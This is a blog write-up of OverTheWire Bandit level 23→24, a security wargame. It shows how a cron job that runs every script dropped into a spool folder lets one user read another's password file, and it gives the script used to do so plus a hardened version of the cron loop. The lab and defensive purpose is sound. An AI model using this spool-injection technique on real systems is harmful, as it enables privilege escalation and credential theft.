BB

technology and craziness.

OverTheWire - Bandit - Level 23 → Level 24

Warning: This post contains a solution!
Only continue if:
1.) you want to see a possible alternative solution or
2.) you are stuck and need a hint!

Connect to the server using the following credentials:

Server: bandit.labs.overthewire.org
Port: 2220
Username: bandit23
Password: jc1uxxxxxxxxxxxxxxxxxxxxxxxxxxxx

Level Goal is:

A program is running automatically at regular intervals from cron, the time-based job scheduler. Look in /etc/cron.d/ for the configuration and see what command is being executed.
NOTE: This level requires you to create your own first shell-script. This is a very big step and you should be proud of yourself when you beat this level!
NOTE 2: Keep in mind that your shell script is removed once executed, so you may want to keep a copy around…

Check the content of the folder /etc/cron.d/:

bandit23@bandit:~$ ls /etc/cron.d/
cronjob_bandit22  cronjob_bandit23  cronjob_bandit24

There are three files; the third one (cronjob_bandit24) is the interesting one for the current level. Take a look at the content:

bandit23@bandit:~$ cat /etc/cron.d/cronjob_bandit24
@reboot bandit24 /usr/bin/cronjob_bandit24.sh &> /dev/null
* * * * * bandit24 /usr/bin/cronjob_bandit24.sh &> /dev/null

A script (/usr/bin/cronjob_bandit24.sh) is executed as the user bandit24 once on reboot and then every minute. Take a look at the content of the script:

bandit23@bandit:~$ cat /usr/bin/cronjob_bandit24.sh 
#!/bin/bash

myname=$(whoami)

cd /var/spool/$myname
echo "Executing and deleting all scripts in /var/spool/$myname:"
for i in * .*;
do
    if [ "$i" != "." -a "$i" != ".." ];
    then
	echo "Handling $i"
	timeout -s 9 60 ./$i
	rm -f ./$i
    fi
done

As the echo message in line seven says, this script executes everything in the folder ’/var/spool/$myname’, which is ’/var/spool/bandit24’ in our case. After executing a script, it deletes the script (the rm -f in line 14).

A temporary folder to save the flag to is needed. Create it first and set its permissions to 777 (lazy, I know) so that bandit24 can write into it:

bandit23@bandit:~$ mkdir /tmp/lvl2324
bandit23@bandit:~$ chmod 777 /tmp/lvl2324

Now, move to that temporary directory and create a short shell script (script.sh) that writes the content of ’/etc/bandit_pass/bandit24’ to ’/tmp/lvl2324/password’:

#!/bin/bash
cat /etc/bandit_pass/bandit24 > /tmp/lvl2324/password

Copy that shell script file to ’/var/spool/bandit24’:

bandit23@bandit:/tmp/lvl2324$ cp script.sh /var/spool/bandit24/

Wait until the shell script file in the folder is deleted and check the password file:

bandit23@bandit:/tmp/lvl2324$ cat password 
UoMYxxxxxxxxxxxxxxxxxxxxxxxxxxxx

Don’t forget to delete the temporary folder:

bandit23@bandit:~$ rm -rf /tmp/lvl2324
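
The level works because /usr/bin/cronjob_bandit24.sh, shown above, runs as bandit24 whatever any user drops into the spool folder. A hardened variant of that loop, as an added example (not part of the original post and not the OverTheWire script): it executes an entry only if it is a regular file, not a symlink, owned by one trusted account and not writable by group or others. The function names and the choice of trusted owner are assumptions, and stat -c assumes GNU coreutils.

```shell
#!/bin/sh
# Added example, not the OverTheWire script. Assumes GNU coreutils (stat -c, timeout).

# is_trusted_job FILE OWNER: succeed only if FILE is safe to execute.
is_trusted_job() {
    f=$1; want_owner=$2
    # Refuse symlinks first, because -f would follow them.
    [ -L "$f" ] && return 1
    [ -f "$f" ] || return 1
    # Only the one trusted account may supply jobs.
    [ "$(stat -c '%U' -- "$f")" = "$want_owner" ] || return 1
    # Mode string looks like -rwxr-xr-x: char 6 is group write, char 9 is other write.
    case "$(stat -c '%A' -- "$f")" in
        ?????w*|????????w*) return 1 ;;
    esac
    return 0
}

# run_spool DIR OWNER: run trusted jobs, skip the rest, then clear the spool
# as the original script does. Prints one RUN/SKIP line per entry.
run_spool() {
    spool=$1; owner=$2
    for job in "$spool"/* "$spool"/.[!.]* "$spool"/..?*; do
        # Skip patterns that matched nothing (the glob is left unexpanded).
        [ -e "$job" ] || [ -L "$job" ] || continue
        if is_trusted_job "$job" "$owner"; then
            echo "RUN  ${job##*/}"
            timeout -s 9 60 "$job" || echo "FAIL ${job##*/}"
        else
            echo "SKIP ${job##*/}"
        fi
        rm -f -- "$job"
    done
}
```

The gap between the check and the execution remains a race if other users can write to the spool folder itself, so the folder should also be writable only by the trusted account.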